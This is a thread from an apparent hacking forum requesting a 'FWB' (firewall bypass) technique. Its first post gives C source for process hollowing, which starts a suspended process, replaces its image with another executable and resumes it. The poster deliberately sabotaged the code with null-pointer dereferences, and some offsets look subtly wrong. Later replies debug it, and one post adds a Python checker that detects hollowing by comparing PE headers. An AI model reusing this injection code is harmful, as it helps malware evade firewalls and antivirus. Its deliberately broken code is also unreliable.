
Thread: [REQ] FWB++

  1. #21
    Night's Watch Joefish
    Join Date
    Oct 2009
    Location
    Clng(&H1337 Xor &H11AD)
    Posts
    415
    Here's one I coded; as long as both exes are 32-bit then injection works fine... even on an x64 platform.
    Ignore the underscores, I'm dynamically calling the functions. Also I added some *(PCHAR)0 shit so copying this ain't possible.

    Code:
    void InjectEXE(LPCSTR target, LPVOID pBuf, LPSTR args)
    {
    	IMAGE_DOS_HEADER IDH;
    	IMAGE_NT_HEADERS INH;
    	IMAGE_SECTION_HEADER ISH;
    	STARTUPINFO SI;
    	PROCESS_INFORMATION PI;
    	CONTEXT Ctxt;
    	DWORD Imagebase;
    	PVOID pPE;
    	DWORD i;
    	DWORD OldProtect;
    
    	smemcpy(&IDH, pBuf, sizeof(IMAGE_DOS_HEADER));
    	
    	if (IDH.e_magic == IMAGE_DOS_SIGNATURE)
    	{
    		smemcpy(&INH, (char *)pBuf + IDH.e_lfanew, sizeof(IMAGE_NT_HEADERS));
    		
    		if (INH.Signature == IMAGE_NT_SIGNATURE)
    		{
    			smemset(&SI, *(char*)0, sizeof(STARTUPINFO));
    			smemset(&PI, *(char*)0, sizeof(PROCESS_INFORMATION));
    
    			if (_CreateProcessA(target, args, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &SI, &PI))
    			{
    				Ctxt.ContextFlags = CONTEXT_FULL;
    				_GetThreadContext(PI.hThread, &Ctxt);
    
    				/* Check if PEB->Imagebase == PE->Imagebase 
    				 * if so then we need to unmap the loaded exe...
    				 * Not too sure if this is the right approach, but at the moment it makes logical sense
    				 */
    				_ReadProcessMemory(PI.hProcess, (LPCVOID)(Ctxt.Ebx + 8), &Imagebase, sizeof(DWORD), NULL);
    				
    				if (Imagebase == INH.OptionalHeader.ImageBase)
    					_NtUnmapViewOfSection(PI.hProcess, (PVOID)Imagebase);
    				
    				if (pPE = _VirtualAllocEx(PI.hProcess, (LPVOID)INH.OptionalHeader.ImageBase, INH.OptionalHeader.SizeOfImage, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE))
    				{
    					if (_WriteProcessMemory(PI.hProcess, (LPVOID)INH.OptionalHeader.ImageBase, pBuf, INH.OptionalHeader.SizeOfHeaders, NULL))
    					{
    						for (i = 0; i < INH.FileHeader.NumberOfSections; i++)
    						{
    							smemcpy(&ISH, (char *)pBuf + IDH.e_lfanew + sizeof(IMAGE_NT_HEADERS) + i * sizeof(IMAGE_SECTION_HEADER), sizeof(IMAGE_SECTION_HEADER));
    
    							if (_WriteProcessMemory(PI.hProcess, (char *)INH.OptionalHeader.ImageBase - ISH.VirtualAddress, (char *)pBuf + ISH.PointerToRawData, ISH.SizeOfRawData, NULL))
    								_VirtualProtectEx(PI.hProcess, (char *)INH.OptionalHeader.ImageBase - ISH.VirtualAddress, ISH.Misc.VirtualSize, CharacteristicsToPageAttributes(ISH.Characteristics), &OldProtect);
    						}
    
    						if (_WriteProcessMemory(PI.hProcess, (char *)Ctxt.Ebx + 8, &INH.OptionalHeader.ImageBase, sizeof(DWORD), NULL))
    						{
    							Ctxt.Eax = INH.OptionalHeader.ImageBase - INH.OptionalHeader.AddressOfEntryPoint;
    							if (_SetThreadContext(PI.hThread, &Ctxt))
    								_ResumeThread(PI.hThread);
    						}
    					}
    				}
    
    				_CloseHandle(&PI.hThread);
    				_CloseHandle(*(char *)(PI.hProcess));
    			}
    		}
    	}
    }
    Is your OS unicode? Just trying to narrow down the possibilities...
    Last edited by Joefish; 28-01-2012 at 10:29. Reason: Adding "dynamic nullp dereference functionality"

    Code to express, not to impress make f*in money lol learn


  2. #22
    Senior Member
    Join Date
    Nov 2011
    Posts
    156
    Gonna try that.
    Nope, I'm not using a Unicode OS.

  3. #23
    Senior Member
    Join Date
    Nov 2011
    Posts
    156
    Well.. it works fine here too.
    I think I'm missing VirtualProtectEx on every section and have to clear the structures before I copy them? I'll try it tomorrow and will reply here, thanks anyway, gonna study it now.

  4. #24
    Senior Member
    Join Date
    Nov 2011
    Posts
    156
    Joefish
    Seems like it doesn't work on Win7 x64 and I can't understand what I'm missing.. You're using structures without pointers; I tried to modify the same thing and it worked fine.. I hate C.

  5. #25
    Senior Member The Executer
    Join Date
    May 2010
    Location
    /system
    Posts
    329
    @joefish:
    It's exactly the same.
    Try running calc's PE by hollowing a file (sa.exe) I am providing.
    PE for calc (taken from XP): calc.txt
    Check in a VM if you want, for backdoors.

    And do tell me the result (under an x64 environment).
    However, I checked your code. It's doing the same thing, and not working on my PC at least.
    i prefer backseat rather than storming the front.
    sniper's way xD

  6. #26
    Senior Member
    Join Date
    Nov 2011
    Posts
    156
    I can't understand: when I'm running calc on an x64 environment, task manager says it is running as a 32-bit process (calc.exe*32) and after injecting, an access violation occurs (code: 0x00000005). Will try it with a debugger.

  7. #27
    Member
    Join Date
    Apr 2011
    Posts
    38
    Quote Originally Posted by Overflowz:
    I can't understand: when I'm running calc on an x64 environment, task manager says it is running as a 32-bit process (calc.exe*32) and after injecting, an access violation occurs (code: 0x00000005). Will try it with a debugger.
    ImageBase!
    Your .exe that you inject into calc has this ImageBase: 00400000h
    Calc has this ImageBase: 01000000h

    Even if calc is a 32-bit process, you have to care about ImageBase!
    Joefish's source code seems to work with an ImageBase which is different between the injected and host process.
    Last edited by Tishrom; 25-02-2012 at 17:17.

  8. #28
    Senior Member
    Join Date
    Dec 2010
    Location
    California
    Posts
    291
    You can't inject a binary into a x64 process unless the binary is compiled as x64 (or you are a wizard).
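    The two posts above come down to header fields: the preferred ImageBase (00400000h vs 01000000h) and the Machine type (32-bit vs x64) of the image mapped over the host. The same fields are what a scanner compares when it suspects hollowing, since the header at PEB->ImageBase (the Ctxt.Ebx + 8 read in Joefish's code) no longer matches the file the process was created from. The following is an added example, not code from this thread or its authors: it parses those fields from a PE header and reports the disagreement, with constructed minimal headers standing in for calc's on-disk file and the mapped payload.

```python
import struct
IMAGE_FILE_MACHINE_I386, IMAGE_FILE_MACHINE_AMD64 = 0x14C, 0x8664
PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B

def parse_pe_header(buf):
    """Pull the fields a hollowing check needs out of a PE header (PE32 or PE32+)."""
    if buf[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew, = struct.unpack_from("<I", buf, 0x3C)
    if buf[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    machine, = struct.unpack_from("<H", buf, e_lfanew + 4)
    opt = e_lfanew + 24  # IMAGE_OPTIONAL_HEADER follows the 20-byte file header
    magic, = struct.unpack_from("<H", buf, opt)
    if magic == PE32_MAGIC:
        image_base, = struct.unpack_from("<I", buf, opt + 28)
    elif magic == PE32PLUS_MAGIC:
        image_base, = struct.unpack_from("<Q", buf, opt + 24)
    else:
        raise ValueError("unknown optional header magic 0x%X" % magic)
    entry, = struct.unpack_from("<I", buf, opt + 16)
    size_of_image, = struct.unpack_from("<I", buf, opt + 56)
    return {"machine": machine, "image_base": image_base,
            "entry": entry, "size_of_image": size_of_image}

def hollowing_indicators(on_disk, in_memory):
    """Compare the file backing a process with the header found at PEB->ImageBase.
    Any disagreement means the mapped image is not the one the process was created from."""
    checks = [("machine", "Machine"), ("image_base", "ImageBase"),
              ("size_of_image", "SizeOfImage"), ("entry", "AddressOfEntryPoint")]
    return ["%s mismatch: disk 0x%X vs memory 0x%X" % (name, on_disk[k], in_memory[k])
            for k, name in checks if on_disk[k] != in_memory[k]]

def make_header(machine, image_base, size_of_image, entry=0x1000):
    """Constructed minimal PE32 header used as test data; not a real executable."""
    dos = b"MZ" + bytes(0x3A) + struct.pack("<I", 0x40)            # e_lfanew = 0x40
    file_hdr = struct.pack("<HHIIIHH", machine, 1, 0, 0, 0, 224, 0x102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, PE32_MAGIC)
    struct.pack_into("<I", opt, 16, entry)                         # AddressOfEntryPoint
    struct.pack_into("<III", opt, 28, image_base, 0x1000, 0x200)   # ImageBase, alignments
    struct.pack_into("<I", opt, 56, size_of_image)
    struct.pack_into("<I", opt, 92, 16)                            # NumberOfRvaAndSizes
    return dos + b"PE\0\0" + file_hdr + bytes(opt)

# Constructed sample: calc's on-disk header (ImageBase 01000000h as quoted above) against
# what a scanner reads at PEB->ImageBase once a 00400000h payload has been mapped in.
CALC_ON_DISK = parse_pe_header(make_header(IMAGE_FILE_MACHINE_I386, 0x01000000, 0x1D000))
HOLLOWED = parse_pe_header(make_header(IMAGE_FILE_MACHINE_I386, 0x00400000, 0x6000, 0x1234))
```

    A clean process yields an empty list; a Machine mismatch is the 32-bit-versus-x64 case from the post directly above.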

  9. #29
    Senior Member
    Join Date
    Nov 2011
    Posts
    156
    itz me
    PLEASE, read posts below before posting.
    --
    Tishrom
    To be honest, I tried the same way but with structure pointers and it still has the same problem. Still studying it in my free time.

  10. #30
    Senior Member
    Join Date
    Apr 2011
    Posts
    203
    Yep, the famous so-called FWB technique is nothing more, nothing less than injection into the default browser. But nowadays many AVs are detecting this operation!!
